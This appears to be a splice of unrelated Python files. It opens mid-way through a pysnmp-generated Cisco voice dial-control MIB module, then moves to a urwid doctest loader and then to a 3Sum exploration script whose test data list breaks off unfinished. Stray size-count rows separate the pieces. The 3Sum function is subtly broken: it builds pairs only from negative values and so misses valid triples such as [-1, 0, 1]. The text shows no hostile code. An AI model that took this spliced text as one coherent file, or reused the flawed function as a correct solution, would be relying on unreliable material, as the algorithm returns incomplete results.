(modes 1, 2, 3) g722r5600 - G.722 (modes 1, 2) g722r6400 - G.722 (mode 1) iSAC - iSAC (10 to 32 kbps) aaclc - AAC-LC Advanced Audio Coding Low Complexity aacld - AAC-LD MPEG-4 Low Delay Audio Coder'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40))
namedValues = NamedValues(("other", 1), ("fax2400", 2), ("fax4800", 3), ("fax7200", 4), ("fax9600", 5), ("fax14400", 6), ("fax12000", 7), ("g729r8000", 10), ("g729Ar8000", 11), ("g726r16000", 12), ("g726r24000", 13), ("g726r32000", 14), ("g711ulawr64000", 15), ("g711Alawr64000", 16), ("g728r16000", 17), ("g723r6300", 18), ("g723r5300", 19), ("gsmr13200", 20), ("g729Br8000", 21), ("g729ABr8000", 22), ("g723Ar6300", 23), ("g723Ar5300", 24), ("ietfg729r8000", 25), ("gsmeEr12200", 26), ("clearChannel", 27), ("g726r40000", 28), ("llcc", 29), ("gsmAmrNb", 30), ("g722", 31), ("iLBC", 32), ("iLBCr15200", 33), ("iLBCr13330", 34), ("g722r4800", 35), ("g722r5600", 36), ("g722r6400", 37), ("iSAC", 38), ("aaclc", 39), ("aacld", 40))
class CvcGUid(TextualConvention, OctetString):
description = 'Represents a Global Call Identifier. The global call identifier is used as an unique identifier for an end-to-end call. A zero length CvcGUid indicates no value for the global call identifier.'
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(0, 16)
class CvcInBandSignaling(TextualConvention, Integer32):
description = 'Represents the type of in-band signaling used between the two end points of the call and is used to inform the router how interpret the ABCD signaling data bits passed as part of the voice payload data. cas - specifies interpret the signaling bits as North American Channel Associated signaling. none - specifies no in-band signaling or signaling is being done via an external method (e.g CCS). cept - specifies interpret the signaling bits as MELCAS transparent - specifies do not interpret or translate the signaling bits. gr303 - specifies interpret the signaling bits as GR303'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("cas", 1), ("none", 2), ("cept", 3), ("transparent", 4), ("gr303", 5))
class CvcCallReferenceIdOrZero(TextualConvention, Unsigned32):
description = 'A call reference ID correlates the video and audio call entries that belong to the same endpoint. In other words, if an audio call entry and a video call entry have the same call reference ID, these entries belong to the same endpoint. Because an audio-only endpoint creates only one call entry, call reference ID is not necessary and is set to zero. A call reference ID with value greater than zero signifies a video call, the value zero is object-specific and must therefore be defined as part of the description of any object which uses this syntax. Examples of the usage of zero include audio calls.'
status = 'current'
class CvcH320CallType(TextualConvention, Integer32):
description = 'This object specifies the H320 call type of a voice call.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2))
namedValues = NamedValues(("none", 0), ("primary", 1), ("secondary", 2))
class CvcVideoCoderRate(TextualConvention, Integer32):
description = 'This object specifies the encoding type used to compress the video data of the voice call.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4))
namedValues = NamedValues(("none", 0), ("h261", 1), ("h263", 2), ("h263plus", 3), ("h264", 4))
cvCommonDcCallActiveTable = MibTable((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1), )
if mibBuilder.loadTexts: cvCommonDcCallActiveTable.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveTable.setDescription('This table is a common extension to the call active table of IETF Dial Control MIB. It contains common call leg information about a network call leg.')
cvCommonDcCallActiveEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1), ).setIndexNames((0, "DIAL-CONTROL-MIB", "callActiveSetupTime"), (0, "DIAL-CONTROL-MIB", "callActiveIndex"))
if mibBuilder.loadTexts: cvCommonDcCallActiveEntry.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveEntry.setDescription('The common information regarding a single network call leg. The call leg entry is identified by using the same index objects that are used by Call Active table of IETF Dial Control MIB to identify the call. An entry of this table is created when its associated call active entry in the IETF Dial Control MIB is created and the call active entry contains information for the call establishment to a network dialpeer. The entry is deleted when its associated call active entry in the IETF Dial Control MIB is deleted.')
cvCommonDcCallActiveConnectionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 1), CvcGUid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveConnectionId.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveConnectionId.setDescription('The global call identifier for the network call.')
cvCommonDcCallActiveVADEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveVADEnable.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveVADEnable.setDescription('The object indicates whether or not the VAD (Voice Activity Detection) is enabled for the voice call.')
cvCommonDcCallActiveCoderTypeRate = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 3), CvcCoderTypeRate()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveCoderTypeRate.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveCoderTypeRate.setDescription('The negotiated coder rate. It specifies the transmit rate of voice/fax compression to its associated call leg for the call. This rate is different from the configuration rate because of rate negotiation during the call.')
cvCommonDcCallActiveCodecBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveCodecBytes.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveCodecBytes.setDescription('Specifies the payload size of the voice packet.')
cvCommonDcCallActiveInBandSignaling = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 5), CvcInBandSignaling()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveInBandSignaling.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveInBandSignaling.setDescription('Specifies the type of in-band signaling being used on the call. This object is instantiated only for Connection Trunk calls.')
cvCommonDcCallActiveCallingName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 6), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveCallingName.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveCallingName.setDescription('The calling party name this call is connected to. If the name is not available, then it will have a length of zero.')
cvCommonDcCallActiveCallerIDBlock = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveCallerIDBlock.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveCallerIDBlock.setDescription('The object indicates whether or not the caller ID feature is blocked for this voice call.')
cvCommonDcCallHistoryTable = MibTable((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1), )
if mibBuilder.loadTexts: cvCommonDcCallHistoryTable.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryTable.setDescription('This table is the Common extension to the call history table of IETF Dial Control MIB. It contains Common call leg information about a network call leg.')
cvCommonDcCallHistoryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1), ).setIndexNames((0, "CISCO-DIAL-CONTROL-MIB", "cCallHistoryIndex"))
if mibBuilder.loadTexts: cvCommonDcCallHistoryEntry.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryEntry.setDescription('The common information regarding a single network call leg. The call leg entry is identified by using the same index objects that are used by Call Active table of IETF Dial Control MIB to identify the call. An entry of this table is created when its associated call history entry in the IETF Dial Control MIB is created and the call history entry contains information for the call establishment to a network dialpeer. The entry is deleted when its associated call history entry in the IETF Dial Control MIB is deleted.')
cvCommonDcCallHistoryConnectionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 1), CvcGUid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryConnectionId.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryConnectionId.setDescription('The global call identifier for the gateway call.')
cvCommonDcCallHistoryVADEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryVADEnable.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryVADEnable.setDescription('The object indicates whether or not the VAD (Voice Activity Detection) was enabled for the voice call.')
cvCommonDcCallHistoryCoderTypeRate = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 3), CvcCoderTypeRate()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryCoderTypeRate.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryCoderTypeRate.setDescription('The negotiated coder rate. It specifies the transmit rate of voice/fax compression to its associated call leg for the call. This rate is different from the configuration rate because of rate negotiation during the call.')
cvCommonDcCallHistoryCodecBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryCodecBytes.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryCodecBytes.setDescription('Specifies the payload size of the voice packet.')
cvCommonDcCallHistoryInBandSignaling = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 5), CvcInBandSignaling()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryInBandSignaling.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryInBandSignaling.setDescription('Specifies the type of in-band signaling used on the call. This object is instantiated only for Connection Trunk calls.')
cvCommonDcCallHistoryCallingName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 6), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryCallingName.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryCallingName.setDescription('The calling party name this call is connected to. If the name is not available, then it will have a length of zero.')
cvCommonDcCallHistoryCallerIDBlock = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryCallerIDBlock.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryCallerIDBlock.setDescription('The object indicates whether or not the caller ID feature is blocked for this voice call.')
cvCommonDcMIBNotificationPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 2))
cvCommonDcMIBNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 2, 0))
cvCommonDcMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 3))
cvCommonDcMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 1))
cvCommonDcMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 2))
cvCommonDcMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 1, 1)).setObjects(("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvCommonDcMIBCompliance = cvCommonDcMIBCompliance.setStatus('deprecated')
if mibBuilder.loadTexts: cvCommonDcMIBCompliance.setDescription('The compliance statement for entities which implement the CISCO VOICE COMMON MIB')
cvCommonDcMIBComplianceRev1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 1, 2)).setObjects(("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallGroup1"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvCommonDcMIBComplianceRev1 = cvCommonDcMIBComplianceRev1.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcMIBComplianceRev1.setDescription('The compliance statement for entities which implement the CISCO VOICE COMMON MIB')
cvCommonDcCallGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 2, 1)).setObjects(("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveConnectionId"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveVADEnable"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCoderTypeRate"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCodecBytes"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveInBandSignaling"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryConnectionId"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryVADEnable"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCoderTypeRate"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCodecBytes"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryInBandSignaling"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvCommonDcCallGroup = cvCommonDcCallGroup.setStatus('deprecated')
if mibBuilder.loadTexts: cvCommonDcCallGroup.setDescription('A collection of objects providing the common network call leg information.')
cvCommonDcCallGroup1 = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 2, 2)).setObjects(("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveConnectionId"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveVADEnable"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCoderTypeRate"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCodecBytes"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveInBandSignaling"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCallingName"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCallerIDBlock"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryConnectionId"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryVADEnable"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCoderTypeRate"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCodecBytes"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryInBandSignaling"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCallingName"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCallerIDBlock"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvCommonDcCallGroup1 = cvCommonDcCallGroup1.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallGroup1.setDescription('A collection of objects providing the common network call leg information.')
mibBuilder.exportSymbols("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", cvCommonDcCallHistoryCallingName=cvCommonDcCallHistoryCallingName, cvCommonDcCallActiveEntry=cvCommonDcCallActiveEntry, cvCommonDcCallHistoryCoderTypeRate=cvCommonDcCallHistoryCoderTypeRate, CvcVideoCoderRate=CvcVideoCoderRate, cvCommonDcCallHistoryVADEnable=cvCommonDcCallHistoryVADEnable, cvCommonDcCallHistoryInBandSignaling=cvCommonDcCallHistoryInBandSignaling, cvCommonDcMIBNotificationPrefix=cvCommonDcMIBNotificationPrefix, CvcCoderTypeRate=CvcCoderTypeRate, cvCommonDcCallActiveCodecBytes=cvCommonDcCallActiveCodecBytes, CvcGUid=CvcGUid, cvCommonDcCallHistoryCodecBytes=cvCommonDcCallHistoryCodecBytes, cvCommonDcMIBComplianceRev1=cvCommonDcMIBComplianceRev1, cvCommonDcCallActive=cvCommonDcCallActive, PYSNMP_MODULE_ID=ciscoVoiceCommonDialControlMIB, cvCommonDcCallHistory=cvCommonDcCallHistory, cvCommonDcCallActiveCallingName=cvCommonDcCallActiveCallingName, cvCommonDcCallActiveVADEnable=cvCommonDcCallActiveVADEnable, cvCommonDcCallActiveCallerIDBlock=cvCommonDcCallActiveCallerIDBlock, cvCommonDcCallHistoryCallerIDBlock=cvCommonDcCallHistoryCallerIDBlock, cvCommonDcMIBCompliance=cvCommonDcMIBCompliance, cvCommonDcCallGroup=cvCommonDcCallGroup, CvcSpeechCoderRate=CvcSpeechCoderRate, cvCommonDcMIBGroups=cvCommonDcMIBGroups, CvcInBandSignaling=CvcInBandSignaling, CvcCallReferenceIdOrZero=CvcCallReferenceIdOrZero, cvCommonDcMIBObjects=cvCommonDcMIBObjects, cvCommonDcMIBCompliances=cvCommonDcMIBCompliances, CvcH320CallType=CvcH320CallType, cvCommonDcCallHistoryEntry=cvCommonDcCallHistoryEntry, cvCommonDcCallActiveCoderTypeRate=cvCommonDcCallActiveCoderTypeRate, cvCommonDcCallGroup1=cvCommonDcCallGroup1, cvCommonDcCallHistoryTable=cvCommonDcCallHistoryTable, cvCommonDcCallActiveConnectionId=cvCommonDcCallActiveConnectionId, cvCommonDcMIBConformance=cvCommonDcMIBConformance, CvcFaxTransmitRate=CvcFaxTransmitRate, cvCommonDcMIBNotifications=cvCommonDcMIBNotifications, cvCommonDcCallActiveTable=cvCommonDcCallActiveTable, ciscoVoiceCommonDialControlMIB=ciscoVoiceCommonDialControlMIB, cvCommonDcCallActiveInBandSignaling=cvCommonDcCallActiveInBandSignaling, cvCommonDcCallHistoryConnectionId=cvCommonDcCallHistoryConnectionId)
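# --- Illustrative usage sketch (not part of the generated MIB module) -------------
# Hedged example, intended for a separate script, of how the symbols exported above
# can be resolved with pysnmp's MIB machinery; everything except the exported names
# (search path setup, variable names) is an assumption.
#
#     from pysnmp.smi import builder
#
#     mib_builder = builder.MibBuilder()
#     mib_builder.loadModules('CISCO-VOICE-COMMON-DIAL-CONTROL-MIB')
#     (coder_rate_col,) = mib_builder.importSymbols(
#         'CISCO-VOICE-COMMON-DIAL-CONTROL-MIB', 'cvCommonDcCallActiveCoderTypeRate')
#     print(coder_rate_col.getName())   # OID (1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 3)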
| 28,327 | 11,703 |
import unittest
import doctest
import urwid
def load_tests(loader, tests, ignore):
    # unittest "load_tests" protocol hook: attach doctest suites for the listed urwid
    # modules to the test suite assembled by unittest discovery.
module_doctests = [
urwid.widget,
urwid.wimp,
urwid.decoration,
urwid.display_common,
urwid.main_loop,
urwid.monitored_list,
urwid.raw_display,
'urwid.split_repr', # override function with same name
urwid.util,
urwid.signals,
urwid.graphics,
]
for m in module_doctests:
tests.addTests(doctest.DocTestSuite(m,
optionflags=doctest.ELLIPSIS | doctest.IGNORE_EXCEPTION_DETAIL))
return tests
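# Minimal sketch (not part of the original module): allow the doctest suite above to be
# run directly with `python this_module.py`, in addition to being picked up through the
# load_tests hook by unittest discovery.
if __name__ == '__main__':
    unittest.main()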
| 600 | 205 |
from unittest import TestCase
def threeSum_old(nums):
    # Brute-force O(n^3) baseline: try every triple and keep unique sorted triples that sum to zero.
result = []
for i in range(len(nums)):
for j in range(i + 1, len(nums)):
for k in range(j + 1, len(nums)):
if nums[i] + nums[j] + nums[k] == 0:
new_list = sorted([nums[i], nums[j], nums[k]])
if new_list not in result:
result.append(new_list)
return result
def threeSum(nums):
    # Attempted optimization over the brute-force version above: sort the input, find the
    # first non-negative entry by binary search, pair up values from the negative prefix,
    # and look up the complementing third value in the non-negative tail.
    # Note that only pairs drawn from the negative prefix are considered.
result = []
if len(nums) < 3:
return []
nums = sorted(nums)
first_positive_index = find_index_of_first_positive(nums)
print("+ve index", first_positive_index, nums[first_positive_index])
for i in range(first_positive_index):
for j in range(i + 1, first_positive_index):
sum_two = nums[i] + nums[j]
if -sum_two in nums[first_positive_index:]:
print("Can", sorted([nums[i], nums[j], nums[nums.index(-sum_two)]]))
new_list = sorted([nums[i], nums[j], nums[nums.index(-sum_two)]])
if new_list not in result:
result.append(new_list)
else:
print("already added")
else:
print("not in list")
print("result", result)
return result
def find_index_of_first_positive(n, start=0, end=None):
    # Binary search over a sorted list: returns the index of the first non-negative value
    # (zero counts, despite the name), or len(n) when every value is negative.
s = start
e = len(n) if end is None else end
mid = int((s + e) / 2)
if mid >= e:
return mid
elif n[mid] < 0:
return find_index_of_first_positive(n, mid + 1, e)
else:
return find_index_of_first_positive(n, s, mid)
print(threeSum([-2, 0, 1, 1, 2]))
print("-=-=-=-")
print(threeSum([-1, 0, 1, 2, -1, -4]))
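# For comparison, a minimal sketch (not part of the original exploration) of the standard
# O(n^2) sorted two-pointer approach to 3Sum. Unlike threeSum() above, it also finds
# triples that contain at most one negative value, e.g. [-1, 0, 1].
def three_sum_two_pointer(nums):
    nums = sorted(nums)
    result = []
    for i in range(len(nums) - 2):
        if i > 0 and nums[i] == nums[i - 1]:
            continue  # skip duplicate anchor values
        lo, hi = i + 1, len(nums) - 1
        while lo < hi:
            total = nums[i] + nums[lo] + nums[hi]
            if total < 0:
                lo += 1
            elif total > 0:
                hi -= 1
            else:
                result.append([nums[i], nums[lo], nums[hi]])
                while lo < hi and nums[lo] == nums[lo + 1]:
                    lo += 1  # skip duplicate second values
                while lo < hi and nums[hi] == nums[hi - 1]:
                    hi -= 1  # skip duplicate third values
                lo += 1
                hi -= 1
    return result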
nums_list = [
82597,
-9243,
62390,
83030,
-97960,
-26521,
-61011,
83390,
-38677,
12333,
75987,
46091,
83794,
19355,
-71037,
-6242,
-28801,
324,
1202,
-90885,
-2989,
-95597,
-34333,
35528,
5680,
89093,
-90606,
50360,
-29393,
-27012,
53313,
65213,
99818,
-82405,
-41661,
-3333,
-51952,
72135,
-1523,
26377,
74685,
96992,
92263,
15929,
5467,
-99555,
-43348,
-41689,
-60383,
-3990,
32165,
65265,
-72973,
-58372,
12741,
-48568,
-46596,
72419,
-1859,
34153,
62937,
81310,
-61823,
-96770,
-54944,
8845,
-91184,
24208,
-29078,
31495,
65258,
14198,
85395,
70506,
-40908,
56740,
-12228,
-40072,
32429,
93001,
68445,
-73927,
25731,
-91859,
-24150,
10093,
-60271,
-81683,
-18126,
51055,
48189,
-6468,
25057,
81194,
-58628,
74042,
66158,
-14452,
-49851,
-43667,
11092,
39189,
-17025,
-79173,
13606,
83172,
92647,
-59741,
19343,
-26644,
-57607,
82908,
-20655,
1637,
80060,
98994,
39331,
-31274,
-61523,
91225,
-72953,
13211,
-75116,
-98421,
-41571,
-69074,
99587,
39345,
42151,
-2460,
98236,
15690,
-52507,
-95803,
-48935,
-46492,
-45606,
-79254,
-99851,
52533,
73486,
39948,
-7240,
71815,
-585,
-96252,
90990,
-93815,
93340,
-71848,
58733,
-14859,
-83082,
-75794,
-82082,
-24871,
-15206,
91207,
-56469,
-93618,
67131,
-8682,
75719,
87429,
-98757,
-7535,
-24890,
-94160,
85003,
33928,
75538,
97456,
-66424,
-60074,
-8527,
-28697,
-22308,
2246,
-70134,
-82319,
-10184,
87081,
-34949,
-28645,
-47352,
-83966,
-60418,
-15293,
-53067,
-25921,
55172,
75064,
95859,
48049,
34311,
-86931,
-38586,
33686,
-36714,
96922,
76713,
-22165,
-80585,
-34503,
-44516,
39217,
-28457,
47227,
-94036,
43457,
24626,
-87359,
26898,
-70819,
30528,
-32397,
-69486,
84912,
-1187,
-98986,
-32958,
4280,
-79129,
-65604,
9344,
58964,
50584,
71128,
-55480,
24986,
15086,
-62360,
-42977,
-49482,
-77256,
-36895,
-74818,
20,
3063,
-49426,
28152,
-97329,
6086,
86035,
-88743,
35241,
44249,
19927,
-10660,
89404,
24179,
-26621,
-6511,
57745,
-28750,
96340,
-97160,
-97822,
-49979,
52307,
79462,
94273,
-24808,
77104,
9255,
-83057,
77655,
21361,
55956,
-9096,
48599,
-40490,
-55107,
2689,
29608,
20497,
66834,
-34678,
23553,
-81400,
-66630,
-96321,
-34499,
-12957,
-20564,
25610,
-4322,
-58462,
20801,
53700,
71527,
24669,
-54534,
57879,
-3221,
33636,
3900,
97832,
-27688,
-98715,
5992,
24520,
-55401,
-57613,
-69926,
57377,
-77610,
20123,
52174,
860,
60429,
-91994,
-62403,
-6218,
-90610,
-37263,
-15052,
62069,
-96465,
44254,
89892,
-3406,
19121,
-41842,
-87783,
-64125,
-56120,
73904,
-22797,
-58118,
-4866,
5356,
75318,
46119,
21276,
-19246,
-9241,
-97425,
57333,
-15802,
93149,
25689,
-5532,
95716,
39209,
-87672,
-29470,
-16324,
-15331,
27632,
-39454,
56530,
-16000,
29853,
46475,
78242,
-46602,
83192,
-73440,
-15816,
50964,
-36601,
89758,
38375,
-40007,
-36675,
-94030,
67576,
46811,
-64919,
45595,
76530,
40398,
35845,
41791,
67697,
-30439,
-82944,
63115,
33447,
-36046,
-50122,
-34789,
43003,
-78947,
-38763,
-89210,
32756,
-20389,
-31358,
-90526,
-81607,
88741,
86643,
98422,
47389,
-75189,
13091,
95993,
-15501,
94260,
-25584,
-1483,
-67261,
-70753,
25160,
89614,
-90620,
-48542,
83889,
-12388,
-9642,
-37043,
-67663,
28794,
-8801,
13621,
12241,
55379,
84290,
21692,
-95906,
-85617,
-17341,
-63767,
80183,
-4942,
-51478,
30997,
-13658,
8838,
17452,
-82869,
-39897,
68449,
31964,
98158,
-49489,
62283,
-62209,
-92792,
-59342,
55146,
-38533,
20496,
62667,
62593,
36095,
-12470,
5453,
-50451,
74716,
-17902,
3302,
-16760,
-71642,
-34819,
96459,
-72860,
21638,
47342,
-69897,
-40180,
44466,
76496,
84659,
13848,
-91600,
-90887,
-63742,
-2156,
-84981,
-99280,
94326,
-33854,
92029,
-50811,
98711,
-36459,
-75555,
79110,
-88164,
-97397,
-84217,
97457,
64387,
30513,
-53190,
-83215,
252,
2344,
-27177,
-92945,
-89010,
82662,
-11670,
86069,
53417,
42702,
97082,
3695,
-14530,
-46334,
17910,
77999,
28009,
-12374,
15498,
-46941,
97088,
-35030,
95040,
92095,
-59469,
-24761,
46491,
67357,
-66658,
37446,
-65130,
-50416,
99197,
30925,
27308,
54122,
-44719,
12582,
-99525,
-38446,
-69050,
-22352,
94757,
-56062,
33684,
-40199,
-46399,
96842,
-50881,
-22380,
-65021,
40582,
53623,
-76034,
77018,
-97074,
-84838,
-22953,
-74205,
79715,
-33920,
-35794,
-91369,
73421,
-82492,
63680,
-14915,
-33295,
37145,
76852,
-69442,
60125,
-74166,
74308,
-1900,
-30195,
-16267,
-60781,
-27760,
5852,
38917,
25742,
-3765,
49097,
-63541,
98612,
-92865,
-30248,
9612,
-8798,
53262,
95781,
-42278,
-36529,
7252,
-27394,
-5021,
59178,
80934,
-48480,
-75131,
-54439,
-19145,
-48140,
98457,
-6601,
-51616,
-89730,
78028,
32083,
-48904,
16822,
-81153,
-8832,
48720,
-80728,
-45133,
-86647,
-4259,
-40453,
2590,
28613,
50523,
-4105,
-27790,
-74579,
-17223,
63721,
33489,
-47921,
97628,
-97691,
-14782,
-65644,
18008,
-93651,
-71266,
80990,
-76732,
-47104,
35368,
28632,
59818,
-86269,
-89753,
34557,
-92230,
-5933,
-3487,
-73557,
-13174,
-43981,
-43630,
-55171,
30254,
-83710,
-99583,
-13500,
71787,
5017,
-25117,
-78586,
86941,
-3251,
-23867,
-36315,
75973,
86272,
-45575,
77462,
-98836,
-10859,
70168,
-32971,
-38739,
-12761,
93410,
14014,
-30706,
-77356,
-85965,
-62316,
63918,
-59914,
-64088,
1591,
-10957,
38004,
15129,
-83602,
-51791,
34381,
-89382,
-26056,
8942,
5465,
71458,
-73805,
-87445,
-19921,
-80784,
69150,
-34168,
28301,
-68955,
18041,
6059,
82342,
9947,
39795,
44047,
-57313,
48569,
81936,
-2863,
-80932,
32976,
-86454,
-84207,
33033,
32867,
9104,
-16580,
-25727,
80157,
-70169,
53741,
86522,
84651,
68480,
84018,
61932,
7332,
-61322,
-69663,
76370,
41206,
12326,
-34689,
17016,
82975,
-23386,
39417,
72793,
44774,
-96259,
3213,
79952,
29265,
-61492,
-49337,
14162,
65886,
3342,
-41622,
-62659,
-90402,
-24751,
88511,
54739,
-21383,
-40161,
-96610,
-24944,
-602,
-76842,
-21856,
69964,
43994,
-15121,
-85530,
12718,
13170,
-13547,
69222,
62417,
-75305,
-81446,
-38786,
-52075,
-23110,
97681,
-82800,
-53178,
11474,
35857,
94197,
-58148,
-23689,
32506,
92154,
-64536,
-73930,
-77138,
97446,
-83459,
70963,
22452,
68472,
-3728,
-25059,
-49405,
95129,
